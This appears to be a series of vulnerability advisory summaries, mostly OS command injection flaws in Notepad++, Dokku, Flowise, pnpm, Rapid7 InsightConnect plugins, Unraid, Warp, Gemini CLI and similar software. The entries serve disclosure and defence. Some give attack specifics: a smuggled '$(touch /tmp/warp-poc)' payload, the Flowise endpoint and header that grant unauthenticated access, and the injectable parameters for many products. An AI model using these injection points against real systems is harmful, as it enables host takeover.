Local code execution in Notepad++ before 8.9.6.1 occurs because the <GUIConfig name="commandLineInterpreter"> value in config.xml is loaded into _nppGUI._commandLineInterpreter with no validation, whitelist, or signature check, then passed directly to ShellExecute when a user invokes File → Open Containing Folder → cmd. An attacker who can plant or modify config.xml runs an arbitrary executable in the victim's session the next time they use this menu action. Publicly available exploit code exists (Exploit-DB 52606), but there is no public exploit identified as actively exploited; the issue is not in CISA KEV.
Local OS command injection in Notepad++ before 8.9.6.1 lets an attacker who can write to a user's shortcuts.xml inject an arbitrary executable path into a <Command> entry under <UserDefinedCommands>, which feedUserCmds() loads into UserCommand._cmd with no validation and later passes straight to ShellExecute when the victim clicks the corresponding Run-menu item. Because the malicious entry renders as an ordinary Run-menu item, it doubles as a stealthy persistence mechanism that executes attacker-chosen binaries in the victim's user context. There is no public exploit identified at time of analysis and the flaw is not listed in CISA KEV, but the fix is confirmed in release 8.9.6.1.
Remote code execution in the Cudy LT300 3.0 4G LTE router (firmware before 2.5.12) lets authenticated users run arbitrary OS commands by embedding shell metacharacters in the cbid.system.ntp.current POST parameter of the system time (NTP) configuration page. Because the CVSS 4.0 vector specifies PR:L, an attacker needs valid (low-privileged) web credentials but no user interaction, and successful injection yields full host compromise (VC/VI/VA all High). No public exploit identified at time of analysis; the flaw was reported by VulnCheck and a vendor patch is available.
Cross-origin information disclosure in the Nx monorepo graph server (versions 17.0.4 through 22.7.1) exposes the full project dependency graph and workspace metadata to any website a developer visits while `nx graph` is running locally. The server unconditionally broadcasts `Access-Control-Allow-Origin: *`, bypassing the browser Same-Origin Policy and allowing attacker-controlled JavaScript to silently read internal project structure. In rare cases, the `/help` endpoint - which executes a workspace-configured target command - creates a path to arbitrary command injection on the developer's machine. No public exploit or CISA KEV listing identified at time of analysis.
Container-to-host command execution in Dokku's cron plugin (versions prior to 0.38.7) lets an actor who can control an application's app.json schedule break out of the Docker container and run arbitrary commands on the host as the privileged Dokku user. Because the cron command was interpolated into a shell-evaluated line, special characters such as ';' or '>' were interpreted on the host rather than confined to the container, yielding a scope-changing escape (CVSS 9.9). No public exploit has been identified at time of analysis, but the root cause and fix are fully documented in the vendor advisory and patch.
OS command injection in Dokku (the Docker-powered self-hosted PaaS) prior to version 0.38.2 allows an authenticated user with git push access to execute arbitrary shell commands as the privileged dokku user. The flaw stems from a permissive app-name validation regex that accepts shell metacharacters, which are then interpolated unquoted into a generated bash pre-receive hook; a semicolon in the app name terminates the intended command and runs attacker-supplied commands on git push. There is no public exploit identified at time of analysis, but the fix is confirmed in 0.38.2 and the underlying mechanics are fully documented in the GitHub advisory and PR #8590.
OS command injection in Dell Container Storage Modules (CSM) version 2.16.0 - spanning the csi-powerstore, csi-unity, csi-powerflex, and csi-powermax CSI drivers - lets a remote, high-privileged attacker inject and execute arbitrary operating-system commands (CWE-78). Successful exploitation yields full confidentiality, integrity, and availability impact with a scope change, meaning command execution can reach beyond the vulnerable component into the surrounding host or cluster. There is no public exploit identified at time of analysis and it is not listed in CISA KEV; the CVSS 3.1 base score is 8.0 (High).
Remote code execution in Flowise (versions 2.2.7-patch.1 through pre-3.0.6) lets attackers run arbitrary OS commands by abusing the Custom MCP feature, which is intended to spawn local MCP servers via tools like npx. Because the default installation runs with no authentication (unless FLOWISE_USERNAME/FLOWISE_PASSWORD are set) and lacks role-based access control, an attacker can POST a crafted JSON payload bearing the 'x-request-from: internal' header to /api/v1/node-load-method/customMCP and fully compromise the host container. Publicly available exploit code exists in the GHSA advisory, including a reverse-shell payload via nc.
Pre-authentication remote code execution in File Browser before 2.63.6 lets unauthenticated attackers run arbitrary OS commands when the optional Hook Authentication feature is enabled. Because login credentials are interpolated into an external shell command via os.Expand without sanitization, shell metacharacters placed in the username or password field at the login screen execute on the server before authentication occurs. No public exploit identified at time of analysis, but the GitHub Security Advisory (GHSA-m93h-4hw7-5qcm) confirms the flaw and CVSS 4.0 rates it 9.3 (Critical).
Arbitrary command execution in pnpm before 10.34.2 and 11.5.3 allows a malicious repository to run attacker-chosen native binaries as the developer or CI user during a routine install. The flaw stems from pnpm processing configDependencies in pnpm-workspace.yaml before command dispatch: a repo could declare pacquet/@pnpm/pacquet as a config dependency, causing pnpm to resolve a platform-specific @pacquet/<platform>-<arch>/pacquet binary from node_modules/.pnpm-config and spawn it. Publicly available exploit code exists, though EPSS is low (0.12%, 2nd percentile) and it is not in CISA KEV.
Arbitrary command execution in Vim's bundled zip plugin (autoload/zip.vim) affects builds from 9.1.1784 up to the 9.2.0678 fix on systems where the plugin falls back to PowerShell for archive operations. When browsing, reading, extracting, updating or deleting zip entries, the plugin quotes archive entry names for the shell but not for PowerShell, so a crafted entry name escapes the string context and runs attacker-supplied commands with the privileges of the user who merely opened or viewed the archive. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV; risk is bounded to Windows/PowerShell-fallback deployments and requires user interaction.
Authenticated command injection in Schneider Electric PowerLogic P7 power metering devices allows a privileged user to execute arbitrary OS commands with elevated privileges over a network-exposed service, fully compromising device integrity, confidentiality, and availability. The flaw (CWE-78) stems from improper neutralization of special elements passed to an underlying OS command. No public exploit identified at time of analysis, and the device is not listed in CISA KEV; EPSS data was not provided.
OS command injection in Dell Display and Peripheral Manager (DDPM) for macOS, all versions prior to 2.3, allows a low-privileged local user to inject and execute arbitrary operating-system commands through improperly neutralized special elements (CWE-78). Because the affected component is a privileged peripheral-management utility, successful injection can yield command execution with full impact to confidentiality, integrity, and availability. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV, so risk is currently theoretical but high-impact for systems with this Dell utility installed.
OS command injection in Rapid7's InsightConnect Tcpdump Plugin (versions before 2.0.0) on Linux lets an authenticated attacker run arbitrary operating-system commands by injecting shell metacharacters into the 'options' or 'filter' parameters, which are unsafely concatenated into a tcpdump shell invocation. An attacker holding low-privileged access to a SOAR workflow that uses this plugin can fully compromise the orchestrator host (high confidentiality, integrity, and availability impact). There is no public exploit identified at time of analysis and the issue is not on the CISA KEV list; EPSS is modest at 0.73%.
OS command injection in Rapid7's InsightConnect Traceroute Plugin (Linux, versions below 1.0.3) lets attackers inject arbitrary shell commands through the traceroute action's host, port, max_ttl, count, or time_out parameters, which are concatenated into a shell command without sufficient validation. Successful exploitation grants full command execution in the plugin container with the same impact on confidentiality, integrity, and availability. This was reported by the vendor (Rapid7) with a fix in 1.0.3; there is no public exploit identified at time of analysis, and EPSS sits at a modest 0.55% (42nd percentile).
Remote OS command injection in Rapid7's InsightConnect AWK Plugin (versions below 1.2.2 on Linux) lets attackers run arbitrary operating-system commands through the process_string action's text or expression parameters, which are unsafely concatenated into a shell command. The CVSS 9.8 rating reflects full confidentiality, integrity, and availability loss with no privileges or user interaction required by the vector. There is no public exploit identified at time of analysis, EPSS is low (0.55%), and CISA SSVC marks exploitation as none, so risk today is potential rather than observed.
OS command injection in Rapid7's InsightConnect Finger Plugin (versions prior to 1.0.3) on Linux lets an authenticated attacker run arbitrary operating-system commands by injecting shell metacharacters into the user or host parameters, which are passed unsanitized into a constructed shell command (CWE-78). Because the plugin executes within the InsightConnect SOAR orchestrator, successful exploitation yields full read/write and availability impact on the host running the plugin. No public exploit is identified at time of analysis, and EPSS estimates only a 0.73% 30-day exploitation probability.
OS command injection in Rapid7's InsightConnect Translate (TR) Plugin on Linux lets remote attackers run arbitrary shell commands by injecting into the 'text' or 'expression' parameters of the TR action, which are concatenated into a shell command without sanitization (CWE-78). All plugin versions before 2.0.3 are affected. There is no public exploit identified at time of analysis and EPSS is low (0.55%), but the flaw yields full system compromise per the vendor's own SSVC 'total' technical-impact rating.
OS command injection in Rapid7's InsightConnect Ping Plugin (versions before 1.0.4) on Linux lets attackers run arbitrary operating-system commands by injecting shell metacharacters into the host parameter of the plugin's ping action, which is concatenated into a shell command without proper sanitization. Any actor able to influence the host input flowing into this SOAR plugin gains full code execution on the plugin's runtime host. There is no public exploit identified at time of analysis, EPSS is low (0.55%), and CISA's SSVC marks exploitation as 'none' and the flaw as not automatable, so risk is real but not yet observed in the wild.
OS command injection in the Rapid7 InsightConnect Sed Plugin on Linux lets an authenticated operator inject arbitrary shell commands through the plugin's `expression` parameter, which is passed to the underlying `sed` invocation without sufficient sanitization. Because InsightConnect is a SOAR orchestration platform, a low-privileged workflow author or connected user (PR:L) can achieve full code execution in the plugin's runtime context (C:H/I:H/A:H, CVSS 8.8). There is no public exploit identified at time of analysis and the issue is not on CISA KEV.
Remote code execution in Quest NetVault Backup allows authenticated remote attackers - who can bypass the product's existing authentication mechanism - to run arbitrary OS commands as SYSTEM via the NVBULogDaemon JSON-RPC interface. The flaw stems from unsanitized user-supplied input being passed into a system call (CWE-78), and the credentialed authentication barrier is undermined by an acknowledged bypass, effectively widening exposure. No public exploit has been identified at time of analysis, but the issue was disclosed by Trend Micro ZDI (ZDI-26-376) and carries a CVSS of 8.8.
OS command injection in Rapid7's InsightConnect SQLmap Plugin (versions before 2.0.1) on Linux lets an authenticated InsightConnect user inject arbitrary operating-system commands through the api_host or api_port fields supplied while configuring the plugin's connection. Because the plugin runs inside the InsightConnect orchestration runtime, a successful injection yields code execution in that automation context (CVSS 8.8, CWE-78). No public exploit identified at time of analysis, and SSVC records exploitation status as none; EPSS is modest at 0.73% (50th percentile).
OS command injection in the Rapid7 InsightConnect RPM Plugin on Linux lets authenticated users run arbitrary operating-system commands by injecting shell metacharacters into the repo, key, or name parameters, which are concatenated into a shell command without sanitization (CWE-78). All versions before 1.0.2 are affected. There is no public exploit identified at time of analysis, and the EPSS probability is low (0.73%, 50th percentile).
Remote authenticated command injection in Unraid's web management server allows attackers to execute arbitrary OS commands as the www-data user by abusing unsanitized input in ToggleState.php. Any user with low-privilege authenticated web access can chain this CWE-78 flaw into full code execution on the underlying NAS host. Discovered and reported through ZDI (ZDI-CAN-30134 / ZDI-26-386); no public exploit identified at time of analysis and no CISA KEV listing.
Authenticated remote code execution in Unraid stems from OS command injection in the web server's FileUpload.php, where a user-supplied string is passed to a system call without validation, letting any logged-in attacker run arbitrary commands as the www-data user. Tracked as ZDI-CAN-30116 and disclosed via the Zero Day Initiative, it carries a CVSS 8.8 rating; no public exploit identified at time of analysis, and it is not listed in CISA KEV.
Stored cross-site scripting leading to OS command execution in SiYuan, an open-source personal knowledge management system, affects all desktop client versions prior to 3.7.0. Untrusted marketplace package metadata (name, version, author, description) is serialized via JSON.stringify() into a single-quoted data-obj HTML attribute without escaping single quotes or angle brackets, so a package name containing a single quote breaks out of the attribute and injects arbitrary HTML; because the Electron BrowserWindow runs with nodeIntegration:true and contextIsolation:false, the DOM XSS escalates to arbitrary command execution on the host. No public exploit identified at time of analysis, but the GitHub Security Advisory (GHSA-x88j-wgpr-h22x) notes this is the same root cause and impact as a prior advisory, reached through a sibling sink the earlier patch missed.
Command injection in Warp's prompt branch-selector chip lets a crafted Git branch name execute in the victim's shell when they click that branch in the UI. It affects Warp builds from 0.2025.08.06.08.12.stable_00 up to the fix in 0.2026.05.06.15.42.stable_01, and is exploitable by anyone able to publish a branch to a repository the victim opens in Warp. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.
Command injection in the Warp agentic development environment (Linux builds 0.2024.02.20.08.01.stable_01 through pre-0.2026.05.06.15.42.stable_01) lets an attacker run arbitrary shell commands as the local user when a victim opens a maliciously named file through an affected external or system-default editor route. Warp expanded freedesktop .desktop Exec templates and passed the result to a shell, so shell metacharacters embedded in a file path are interpreted rather than treated as data. There is no public exploit identified at time of analysis and the issue is not in CISA KEV; impact is high (CVSS 7.8) but requires local context and user interaction.
Command injection in Warp's legacy SSH background command path lets an attacker-controlled remote host inject shell syntax that runs as the victim's authenticated SSH account. Affecting Warp from 0.2023.03.21.08.02.stable_00 up to (but not including) 0.2026.05.06.15.42.stable_01, the flaw stems from the terminal trusting the remote working directory, repository, or directory name reported by an SSH session when assembling helper commands for metadata collection. No public exploit identified at time of analysis, though the fix commit ships regression tests that demonstrate the breakout; not listed in CISA KEV and no EPSS provided.
Terminal lifecycle hook spoofing in Warp versions prior to 0.2026.05.06.15.42.stable_01 allows an attacker who controls terminal output viewed by a victim to inject unauthenticated shell integration hooks into the PTY stream, causing Warp to accept falsified session metadata - including spoofed current working directory and SSH session transport parameters. Exploitation requires user interaction (the victim must view attacker-controlled terminal content in Warp), and no public exploit code has been identified at time of analysis. The CVSS-assigned availability impact (A:L) and absence of integrity impact (I:N) appear inconsistent with the described spoofing behavior; session state falsification is the primary operational concern for affected users.
OS command injection in Warp (the agentic terminal/development environment) affects builds from 0.2024.03.12.08.02.stable_01 up to the fix in 0.2026.05.06.15.42.stable_01 when running under Windows Subsystem for Linux. When wslview cannot open a URL, Warp falls back to a Windows command processor (cmd.exe /c start), so a malicious URL emitted into terminal output executes attacker-controlled Windows commands once the user clicks the link. No public exploit identified at time of analysis and the issue is not in CISA KEV, but the fix commit clearly documents the injection path.
OS command injection in Warp's AI Agent code-search tooling allows attacker-controlled inputs to escape read-only search operations and execute arbitrary shell commands in the user's terminal. Affected builds from 0.2025.04.09.08.11.stable_00 up to 0.2026.05.06.15.42.stable_01 implement the Grep and FileGlob actions — which the Agent's command-execution policy authorizes only as read/search — by concatenating Agent-supplied search text, paths, and glob patterns into unquoted shell command strings. There is no public exploit identified at time of analysis, though the vendor fix commit and its regression tests publicly demonstrate the injection technique (e.g. a $(touch /tmp/warp-poc) payload).
Pre-sandbox host-level code execution in Google Gemini CLI (versions prior to 0.39.1) and the run-gemini-cli GitHub Action (prior to 0.1.22) allows an unprivileged attacker to run arbitrary commands on CI/CD runner hosts by planting a malicious .gemini/.env file in an untrusted workspace. In headless mode the tool automatically trusted workspace folders and loaded their environment variables before sandboxing, so a workflow that processes attacker-controlled content (for example reviewing a submitted pull request) would execute attacker-supplied commands on the host. No public exploit has been identified at time of analysis, but Google rates this CVSS 4.0 10.0 and a vendor advisory (GHSA-wpqr-6v78-jr5g) with fixed releases is available.
Jenkins Git client Plugin 6.6.0 and earlier does not correctly escape the workspace directory name when it is embedded into a generated SSH wrapper script, allowing attackers able to control the name of a build's working directory to execute arbitrary operating system commands on the agent.
Remote OS command injection in GeoVision GV-I/O Box 4E firmware 2.09 allows attackers with high privileges to execute arbitrary shell commands by sending crafted network packets to the DVRSearch service or Network.cgi endpoint. The flaw lives in libNetSetObj.so where DNS configuration values are concatenated into a shell command string and passed to system() without sanitization. No public exploit identified at time of analysis, but the vendor advisory and a Talos vulnerability report are published.